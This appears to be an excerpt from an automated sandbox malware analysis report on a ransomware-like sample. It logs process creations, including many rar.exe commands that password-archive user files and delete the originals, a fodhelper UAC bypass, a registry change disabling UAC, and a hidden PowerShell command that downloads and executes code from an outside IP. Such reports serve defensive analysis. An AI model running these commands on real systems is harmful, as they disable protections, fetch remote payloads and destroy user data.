          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B6A6D0 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,56_2_00007FF650B6A6D0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B6AAF0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_00007FF650B6AAF0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B74A80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_00007FF650B74A80
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B6ACA8 SetUnhandledExceptionFilter,56_2_00007FF650B6ACA8
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B69D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,56_2_00007FF650B69D5C

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_4440.amsi.csv, type: OTHER
          Source: Yara matchFile source: C:\Users\user\Documents\20220813\PowerShell_transcript.179605.PThsxFDM.20220813090655.txt, type: DROPPED
          Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.bat, type: DROPPED
          Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.bat, type: DROPPED
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ===="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ===="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IZCU4SKWJBHUSS2OFZWXAMY=.rar1" "C:/Users/user/Desktop/IZCU4SKWJBHUSS2OFZWXAMY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ===="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IZCU4SKWJBHUSS2OFZWXAMY=.rar1" "C:/Users/user/Desktop/IZCU4SKWJBHUSS2OFZWXAMY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ===="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY="
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C fodhelper.exeJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process get executablepathJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\findstr.exe findstr encrypt.exeJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper.exeJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\reg.exe "reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start msupdateJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt')Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\daemon.exe C:\Windows\Temp\daemon.exeJump to behavior
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process get executablepath
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\findstr.exe findstr encrypt.exe
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process get executablepath
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\findstr.exe findstr scan.exe
          Source: C:\Windows\Temp\daemon.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\daemon.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\daemon.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\daemon.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\daemon.exeProcess created: unknown unknown
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process get executablepath
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ===="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\rar.exe C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
